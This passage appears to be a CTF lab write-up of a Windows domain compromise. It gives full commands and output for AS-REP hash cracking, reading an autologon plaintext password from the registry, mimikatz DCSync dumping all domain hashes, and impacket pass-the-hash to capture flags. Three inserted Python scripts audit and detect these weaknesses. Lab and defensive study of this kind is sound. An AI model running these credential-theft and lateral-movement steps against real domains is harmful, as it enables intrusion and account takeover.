└─# hashcat -a 0 --force ss.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-14650HX, 1424/2912 MB (512 MB allocatable), 4MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:72d2bae127798ec3ab56405067b72fb3$f32f22f2de9cbec10e31d36d94bc609623e0754e1a53d2270e6ee291688f5de431ca42fd35d5970f714e0e335c7ad2cb4b8b58c99c557a40f206f44c6c69ac701a59dd9cfb7bee01c1153efa86aebdc93f1eecab9e29d6427e1f9c85115951b619418d9a9a52f6ac4dfb96955179ce31b9b86d716f2f12f5f717ac4eea46c6d10b2dc91adc5f6eb4cfa0dd520153122ac52445454ea65ed1417168868097457d50b2570077a3f28c55eb39f053e7fc87fb46b75c25b4585300929e89fb8338dd95e98dda3eb9d44a9f2562aef5d793987e0f4651a02c336412d47b393336af5107ca6c235197be1ec6e933e0:strawberry

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:72...e933e0
Time.Started.....: Sun Nov 16 18:32:23 2025, (1 sec)
Time.Estimated...: Sun Nov 16 18:32:24 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8082 H/s (1.36ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1024/14344385 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> bethany
Hardware.Mon.#1..: Util: 23%

Started: Sun Nov 16 18:31:41 2025
Stopped: Sun Nov 16 18:32:25 2025

This gives the account and its password:

zhangxin@xiaorang.lab
strawberry
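Why zhangxin returned an AS-REP hash while ganjian did not comes down to one bit, DONT_REQ_PREAUTH, in the account's userAccountControl value. The decoder below is an added example, not part of the original post: it audits rows shaped like the `lsadump::dcsync /csv` output shown later on this page (RID, name, hash, userAccountControl). The account names and UAC numbers are the ones that output prints; the hash column is a constructed placeholder.

```python
# Added example: decode userAccountControl (UAC) and list accounts that
# answer AS-REQ without Kerberos pre-authentication (AS-REP roastable).

UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0000020: "PASSWD_NOTREQD",
    0x0000200: "NORMAL_ACCOUNT",
    0x0001000: "WORKSTATION_TRUST_ACCOUNT",
    0x0002000: "SERVER_TRUST_ACCOUNT",
    0x0010000: "DONT_EXPIRE_PASSWORD",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x0200000: "USE_DES_KEY_ONLY",
    0x0400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Constructed sample: names and UAC values as printed on this page,
# hash column replaced by a placeholder.
SAMPLE_ROWS = """\
[DC] Exporting domain 'xiaorang.lab'
1167 ganjian <redacted> 512
1178 wenshao <redacted> 4260352
1179 zhangxin <redacted> 4260352
1180 yuxuan <redacted> 66048
502 krbtgt <redacted> 514
1000 DC-PROGAME$ <redacted> 532480
1181 WIN2019$ <redacted> 4096
"""


def decode_uac(value):
    """Return the flag names set in a UAC integer, lowest bit first."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    unknown = value & ~sum(UAC_FLAGS)  # bits this table does not name
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:X}")
    return names


def parse_rows(text):
    """Parse 'RID name hash UAC' rows; banner lines such as '[DC] ...' are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].isdigit() or not parts[-1].isdigit():
            continue
        rows.append({
            "rid": int(parts[0]),
            "name": " ".join(parts[1:-2]),
            "flags": decode_uac(int(parts[-1])),
        })
    return rows


def asrep_roastable(rows):
    """Enabled accounts with DONT_REQ_PREAUTH: the KDC hands out an AS-REP
    encrypted with their password-derived key to anyone who asks."""
    return sorted(
        r["name"] for r in rows
        if "DONT_REQ_PREAUTH" in r["flags"] and "ACCOUNTDISABLE" not in r["flags"]
    )


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for r in rows:
        print(f'{r["rid"]:>5} {r["name"]:<12} {", ".join(r["flags"])}')
    # Fix: clear the flag on each listed account; where it cannot be cleared,
    # give the account a long random password so the AS-REP resists a wordlist.
    print("AS-REP roastable:", asrep_roastable(rows))
```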

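Set up the proxy and connect over RDP.

I have a question here: why do we connect to the 25 machine rather than the 12 machine?

Once connected, check the registry to see whether a default user password is stored.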

C:\Users\zhangxin>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
ShellAppRuntime REG_SZ ShellAppRuntime.exe
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xedd7ccd15
ShutdownFlags REG_DWORD 0x80000027
AutoLogonSID REG_SZ S-1-5-21-3623938633-4064111800-2925858365-1180
LastUsedUsername REG_SZ yuxuan
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ yuxuan
DefaultPassword REG_SZ Yuxuan7QbrgZ3L
DefaultDomainName REG_SZ xiaorang.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
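The output above shows the finding to audit for on every host: `AutoAdminLogon` set to `1` next to a plaintext `DefaultPassword`, readable here by an ordinary domain user. The script below is an added example, not from the original post: it parses saved `reg query` output and reports stored autologon credentials without echoing the password. The sample input is constructed and its user, domain and password are placeholders.

```python
import re

# Matches "<name> <REG_TYPE> [data]". The lazy name group tolerates value
# names containing spaces; data may be absent (an empty REG_SZ).
VALUE_RE = re.compile(r"^\s*(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)(?:\s+(?P<data>.*))?$")

# Constructed sample in the shape of the output above (placeholder values).
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    LegalNoticeCaption    REG_SZ
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    kiosk-user
    DefaultPassword    REG_SZ    Constructed-Passw0rd
    DefaultDomainName    REG_SZ    example.lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""


def parse_reg_query(text):
    """Return {key_path: {value_name_lower: (type, data)}} from `reg query` text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        if line.lstrip().upper().startswith("HKEY_"):
            current = keys.setdefault(line.strip(), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # Registry value names are case-insensitive, so normalise them.
            current[m["name"].lower()] = (m["type"], m["data"] or "")
    return keys


def audit_autologon(values):
    """Flag stored autologon credentials among one Winlogon key's values."""
    def data(name):
        return values.get(name.lower(), ("", ""))[1].strip()

    password = data("DefaultPassword")
    if not password:
        return []
    account = "\\".join(
        p for p in (data("DefaultDomainName"), data("DefaultUserName")) if p
    ) or "unknown account"
    # Report only the length: the finding itself must not leak the secret.
    if data("AutoAdminLogon") == "1":
        return [f"HIGH: AutoAdminLogon enabled, {len(password)}-character "
                f"plaintext DefaultPassword stored for {account}"]
    return [f"MEDIUM: AutoAdminLogon is off but a stale DefaultPassword "
            f"remains for {account}"]


def audit_output(text):
    """Audit every ...\\Winlogon key found in the captured output."""
    findings = []
    for key, values in parse_reg_query(text).items():
        if key.lower().endswith("\\winlogon"):
            findings += audit_autologon(values)
    return findings


if __name__ == "__main__":
    # Fix: delete DefaultPassword and rotate that account's password. If
    # autologon is required, Sysinternals Autologon keeps the password as an
    # LSA secret instead of a value any local user can read.
    for finding in audit_output(SAMPLE_OUTPUT):
        print(finding)
```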

Switch accounts, upload mimikatz, then extract the hashes.

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /domain:xiaorang.lab /user:administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] 'administrator' will be the user account

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2025/11/16 16:21:06
Object Security ID : S-1-5-21-3623938633-4064111800-2925858365-500
Object Relative ID : 500

Credentials:
Hash NTLM: 04d93ffd6f5f6e4490e0de23f240a5e9

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 77bee309df2d6aa8d6de211e0f9bc576

* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a7c1e1940765d04f18ac3a43d09588e96af827808f921e5855730a2a050ef007
aes128_hmac (4096) : 3c7453f1f392a7f8c1af77696a160f2d
des_cbc_md5 (4096) : a8e0b35eefe9d3d0
OldCredentials
aes256_hmac (4096) : a7c1e1940765d04f18ac3a43d09588e96af827808f921e5855730a2a050ef007
aes128_hmac (4096) : 3c7453f1f392a7f8c1af77696a160f2d
des_cbc_md5 (4096) : a8e0b35eefe9d3d0

* Primary:Kerberos *
Default Salt : XIAORANG.LABAdministrator
Credentials
des_cbc_md5 : a8e0b35eefe9d3d0
OldCredentials
des_cbc_md5 : a8e0b35eefe9d3d0

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 0f7990fa51442d1fc1b9f5703b7a9f53
02 f8f3ab7a545c3df42068692e22e5fd1a
03 63b49f8e791de04010e0d3838864fb5d
04 0f7990fa51442d1fc1b9f5703b7a9f53
05 7c94fce5f59a52edc7c941683f529315
06 db3d41291d2865f07788fcd0878e9048
07 8cffc17d1ac652e058047f177988f94f
08 e0204b55258553e92222b39548b6bf64
09 c024e8558b548d9ed0dac80cb3937227
10 a55582f6895260bfb4c18eccc5e43639
11 23cd59de8b7fc224a076a0f3001afbfa
12 e0204b55258553e92222b39548b6bf64
13 b4716b4fe3233db5dd79d97fe470a11b
14 b6b21073a6bd20a1ef665cbdf3633bc9
15 472854e67b07839a52b40ddeec245582
16 d47433701f75461a006ab9a73a7ba33b
17 7655b2aeae13a52426da7558382f1e98
18 3c384e9401eb1d0467ee29affd959e98
19 a68e52c5f665ac7f178061a140670af0
20 51a1204a8e37e806fdfb16f0c2ffd7cb
21 014900de757e1f20310d8c0d1fb1d812
22 3f683ca0caafbd5e4dee3b919901066d
23 b12255387f518480c552971cbab71ac1
24 6c1b44f40c541a959d45423231dccef4
25 c18dd5d14b73706c6abc66233f42ada8
26 11a8ab9dc7e507ee0d99d3295f7c9e06
27 d5ab194a6f297a6565e230ce525f0539
28 3b50d0aa5201e3e934bccbe200010ddb
29 97bafc631fb4dfe596c1a2c5e0ad19e5
mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
1103 shuzhen 07c1f387d7c2cf37e0ca7827393d2327 512
1104 gaiyong 52c909941c823dbe0f635b3711234d2e 512
1106 xiqidi a55d27cfa25f3df92ad558c304292f2e 512
1107 wengbang 6b1d97a5a68c6c6c9233d11274d13a2e 512
1108 xuanjiang a72a28c1a29ddf6509b8eabc61117c6c 512
1109 yuanchang e1cea038f5c9ffd9dc323daf35f6843b 512
1110 lvhui f58b31ef5da3fc831b4060552285ca54 512
1111 wenbo 9abb7115997ea03785e92542f684bdde 512
1112 zhenjun 94c84ba39c3ece24b419ab39fdd3de1a 512
1113 jinqing 4bf6ad7a2e9580bc8f19323f96749b3a 512
1115 yangju 1fa8c6b4307149415f5a1baffebe61cf 512
1117 weicheng 796a774eace67c159a65d6b86fea1d01 512
1118 weixian 8bd7dc83d84b3128bfbaf165bf292990 512
1119 haobei 045cc095cc91ba703c46aa9f9ce93df1 512
1120 jizhen 1840c5130e290816b55b4e5b60df10da 512
1121 jingze 3c8acaecc72f63a4be945ec6f4d6eeee 512
1122 rubao d8bd6484a344214d7e0cfee0fa76df74 512
1123 zhaoxiu 694c5c0ec86269daefff4dd611305fab 512
1124 tangshun 90b8d8b2146db6456d92a4a133eae225 512
1125 liangliang c67cd4bae75b82738e155df9dedab7c1 512
1126 qiyue b723d29e23f00c42d97dd97cc6b04bc8 512
1127 chouqian c6f0585b35de1862f324bc33c920328d 512
1128 jicheng 159ee55f1626f393de119946663a633c 512
1129 xiyi ee146df96b366efaeb5138832a75603b 512
1130 beijin a587b90ce9b675c9acf28826106d1d1d 512
1131 chenghui 08224236f9ddd68a51a794482b0e58b5 512
1132 chebin b50adfe07d0cef27ddabd4276b3c3168 512
1133 pengyuan a35d8f3c986ab37496896cbaa6cdfe3e 512
1134 yanglang 91c5550806405ee4d6f4521ba6e38f22 512
1135 jihuan cbe4d79f6264b71a48946c3fa94443f5 512
1136 duanmuxiao 494cc0e2e20d934647b2395d0a102fb0 512
1137 hongzhi f815bf5a1a17878b1438773dba555b8b 512
1138 gaijin b1040198d43631279a63b7fbc4c403af 512
1139 yifu 4836347be16e6af2cd746d3f934bb55a 512
1140 fusong adca7ec7f6ab1d2c60eb60f7dca81be7 512
1141 luwan c5b2b25ab76401f554f7e1e98d277a6a 512
1142 tangrong 2a38158c55abe6f6fe4b447fbc1a3e74 512
1143 zhufeng 71e03af8648921a3487a56e4bb8b5f53 512
1145 dongcheng f2fdf39c9ff94e24cf185a00bf0a186d 512
1146 lianhuangchen 23dc8b3e465c94577aa8a11a83c001af 512
1147 lili b290a36500f7e39beee8a29851a9f8d5 512
1148 huabi 02fe5838de111f9920e5e3bb7e009f2f 512
1149 rangsibo 103d0f70dc056939e431f9d2f604683c 512
1150 wohua cfcc49ec89dd76ba87019ca26e5f7a50 512
1151 haoguang 33efa30e6b3261d30a71ce397c779fda 512
1152 langying 52a8a125cd369ab16a385f3fcadc757d 512
1153 diaocai a14954d5307d74cd75089514ccca097a 512
1154 lianggui 4ae2996c7c15449689280dfaec6f2c37 512
1155 manxue 0255c42d9f960475f5ad03e0fee88589 512
1156 baqin 327f2a711e582db21d9dd6d08f7bdf91 512
1157 chengqiu 0d0c1421edf07323c1eb4f5665b5cb6d 512
1158 louyou a97ba112b411a3bfe140c941528a4648 512
1159 maqun 485c35105375e0754a852cee996ed33b 512
1160 wenbiao 36b6c466ea34b2c70500e0bfb98e68bc 512
1161 weishengshan f60a4233d03a2b03a7f0ae619c732fae 512
1163 chuyuan 0cfdca5c210c918b11e96661de82948a 512
1164 wenliang a4d2bacaf220292d5fdf9e89b3513a5c 512
1165 yulvxue cf970dea0689db62a43b272e2c99dccd 512
1166 luyue 274d823e941fc51f84ea323e22d5a8c4 512
1167 ganjian 7d3c39d94a272c6e1e2ffca927925ecc 512
1168 pangzhen 51d37e14983a43a6a45add0ae8939609 512
1169 guohong d3ce91810c1f004c782fe77c90f9deb6 512
1170 lezhong dad3990f640ccec92cf99f3b7be092c7 512
1171 sheweiyue d17aecec7aa3a6f4a1e8d8b7c2163b35 512
1172 dujian 8f7846c78f03bf55685a697fe20b0857 512
1173 lidongjin 34638b8589d235dea49e2153ae89f2a1 512
1174 hongqun 6c791ef38d72505baeb4a391de05b6e1 512
1175 yexing 34842d36248c2492a5c9a1ae5d850d54 512
1176 maoda 6e65c0796f05c0118fbaa8d9f1309026 512
1177 qiaomei 6a889f350a0ebc15cf9306687da3fd34 512
502 krbtgt a4206b127773884e2c7ea86cdd282d9c 514
1178 wenshao b31c6aa5660d6e87ee046b1bb5d0ff79 4260352
500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 512
1000 DC-PROGAME$ a13c5b70e58289485abf99c9f0cda48b 532480
1181 WIN2019$ 2772fb77ea4ad12ea5465f1cf3e0be83 4096
1180 yuxuan 376ece347142d1628632d440530e8eed 66048
1179 zhangxin d6c5976e07cdb410be19b84126367e3d 4260352

This gives the domain controller's hash:

Administrator   04d93ffd6f5f6e4490e0de23f240a5e9
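On the defending side, the `lsadump::dcsync` calls above are directory replication requests, which a domain controller records as Security event 4662 carrying the replication extended-right GUIDs. The detector below is an added example, not from the original post: it flags any subject outside an allowlist of replication principals that exercises those rights. The event records are constructed; their account names are taken from this page on the assumption that the DCSync ran as yuxuan.

```python
import re
from collections import defaultdict

# Extended rights checked when a principal replicates directory data.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")
CONTROL_ACCESS = 0x100  # access mask bit for extended (control access) rights

# Constructed records shaped like parsed Security-log events.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC-PROGAME$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "yuxuan", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "yuxuan", "AccessMask": "0x100",
     "Properties": "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Ordinary property read: not a replication right, must not alert.
    {"EventID": 4662, "SubjectUserName": "zhangxin", "AccessMask": "0x10",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # Unrelated event type: ignored.
    {"EventID": 4624, "SubjectUserName": "yuxuan"},
]


def detect_dcsync(events, replication_principals):
    """Return {subject: [replication rights used]} for subjects that are not
    in the allowlist (DC machine accounts, directory sync service accounts)."""
    allowed = {name.lower() for name in replication_principals}
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.lower() in allowed:
            continue
        for guid in GUID_RE.findall(ev.get("Properties", "")):
            right = REPLICATION_RIGHTS.get(guid.lower())
            if right:
                hits[subject].add(right)
    return {subject: sorted(rights) for subject, rights in hits.items()}


def replicates_secrets(rights):
    """Get-Changes-All is the right that exposes password hashes."""
    return "DS-Replication-Get-Changes-All" in rights


if __name__ == "__main__":
    # Needs the "Audit Directory Service Access" subcategory enabled on DCs.
    for subject, rights in detect_dcsync(SAMPLE_EVENTS, ["DC-PROGAME$"]).items():
        level = "CRITICAL" if replicates_secrets(rights) else "WARN"
        print(f"{level}: {subject} requested {', '.join(rights)}")
```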

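Then just move laterally and read the flags directly.

Why does it have to be uppercase? Why does moving laterally let us read them? Why use DCSync directly to get the domain admin's hash? Why is the domain admin's hash not that of the DC machine?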

┌──(root㉿kali)-[/home/kali]
└─# proxychains impacket-wmiexec XIAORANG/administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.25:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.25:135 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.25:49888 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\flag\flag*

C:\Users\Administrator\flag\flag03.txt


flag03: flag{7af6ade3-bcb3-43ba-b7af-0e0a78a70e49}


Maybe you can find something interesting on this server.
=======================================
What you may not know is that many objects in this domain
are moved from other domains.

flag4

┌──(root㉿kali)-[/home/kali]
└─# proxychains impacket-wmiexec XIAORANG/administrator@172.22.6.12 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.12:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.12:135 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.12:49668 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\flag\flag*

C:\Users\Administrator\flag\flag04.txt


Awesome! you got the final flag.

:::::::::::::::::::::::::: :::: ::::::::::
:+: :+: +:+:+: :+:+:+:+:
+:+ +:+ +:+ +:+:+ +:++:+
+#+ +#+ +#+ +:+ +#++#++:++#
+#+ +#+ +#+ +#++#+
#+# #+# #+# #+##+#
### ############## #############


flag04: flag{f7a91977-3ec8-4207-9fd4-f031d5c20766}

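Reading back over this writeup, doesn't it look completely illogical, as if it amounts to nothing at all? So next I am going to redo it as a detailed walkthrough, with proper logic and more steps, explaining why each step is done, what its purpose and underlying principle are, and why it can be done this way and not another.

Stay tuned for the detailed version of the 春秋云镜 Time review.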